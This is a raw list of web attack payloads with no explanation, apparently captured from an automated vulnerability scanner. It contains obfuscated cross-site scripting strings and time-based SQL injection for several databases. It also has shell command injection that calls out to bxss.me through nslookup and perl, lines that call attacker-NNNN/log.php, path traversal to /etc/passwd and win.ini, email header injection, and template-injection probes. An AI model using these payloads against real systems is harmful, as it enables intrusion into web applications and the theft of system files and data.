http://attacker-9529/log.php?
}body{acu:Expre/**/SSion(O3iK(9344))}
\u003CScRiPt\O3iK(9795)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%4F%33%69%4B%289765%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9581/log.php?
}body{acu:Expre/**/SSion(22UW(9494))}
\u003CScRiPt\22UW(9184)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%32%32%55%57%289057%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9992/log.php?
}body{acu:Expre/**/SSion(bjX5(9341))}
\u003CScRiPt\bjX5(9173)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%62%6A%58%35%289261%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9676/log.php?
}body{acu:Expre/**/SSion(NzPO(9036))}
\u003CScRiPt\NzPO(9079)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%4E%7A%50%4F%289337%29%3C%2F%73%43%72%69%70%54%3E
http://attacker-9761/log.php?
}body{acu:Expre/**/SSion(Hp54(9047))}
\u003CScRiPt\Hp54(9911)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%48%70%35%34%289122%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
''||(select 1 from (select pg_sleep(15))x)||''
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
tYMpREA6')) OR 898=(SELECT 898 FROM PG_SLEEP(15))--
TXwodhFc') OR 780=(SELECT 780 FROM PG_SLEEP(15))--
2Dpxlp3X' OR 599=(SELECT 599 FROM PG_SLEEP(15))--
-1)) OR 106=(SELECT 106 FROM PG_SLEEP(15))--
-5) OR 108=(SELECT 108 FROM PG_SLEEP(15))--
-5 OR 290=(SELECT 290 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+109-109-1=0+0+0+1
-1 OR 2+109-109-1=0+0+0+1
`(nslookup hitjuychobdvic280a.bxss.me||perl -e "gethostbyname('hitjuychobdvic280a.bxss.me')")`
|(nslookup hitafmrpdaotsc8fde.bxss.me||perl -e "gethostbyname('hitafmrpdaotsc8fde.bxss.me')")
&(nslookup hitwopzejoipra0633.bxss.me||perl -e "gethostbyname('hitwopzejoipra0633.bxss.me')")&'\"...
$(nslookup hitfkhsfnzbrm7ec94.bxss.me||perl -e "gethostbyname('hitfkhsfnzbrm7ec94.bxss.me')")
(nslookup hityrmohwzgfv210ab.bxss.me||perl -e "gethostbyname('hityrmohwzgfv210ab.bxss.me')")
|echo xkpzqk$()\ vbktfc\nz^xyu||a #' |echo xkpzqk$()\ vbktfc\nz^xyu||a #|" |echo xkpzqk$()\ vbktf...
&echo fyrpwt$()\ ayvtfj\nz^xyu||a #' &echo fyrpwt$()\ ayvtfj\nz^xyu||a #|" &echo fyrpwt$()\ ayvtf...
echo zhodbr$()\ urmpxp\nz^xyu||a #' &echo zhodbr$()\ urmpxp\nz^xyu||a #|" &echo zhodbr$()\ urmpxp...
http://bxss.me/t/fit.txt?.jpg
1some_inexistent_file_with_long_name
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
'+'A'.concat(70-3).concat(22*4).concat(117).concat(81).concat(119).concat(80)+(require'socket'
So...
"+"A".concat(70-3).concat(22*4).concat(112).concat(72).concat(118).concat(66)+(require"socket"
So...
HttP://bxss.me/t/xss.html?%00
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
".gethostbyname(lc("hityx"."oppxkhcuc8ce4.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(66)...
'.gethostbyname(lc('hitvm'.'tofqffcp577c0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(72)...
to@example.com>
bcc:074625.19373-155204.19373.a6d22.19130.2@bxss.me
../../../../../../../../../../../../../../windows/win.ini
bcc:074625.19373-155203.19373.a6d22.19130.2@bxss.me
../../../../../../../../../../../../../../etc/passwd
"+response.write(9475040*9209076)+"
'+response.write(9475040*9209076)+'
response.write(9475040*9209076)
ctime
sleep
p0
(I30
tp1
Rp2
.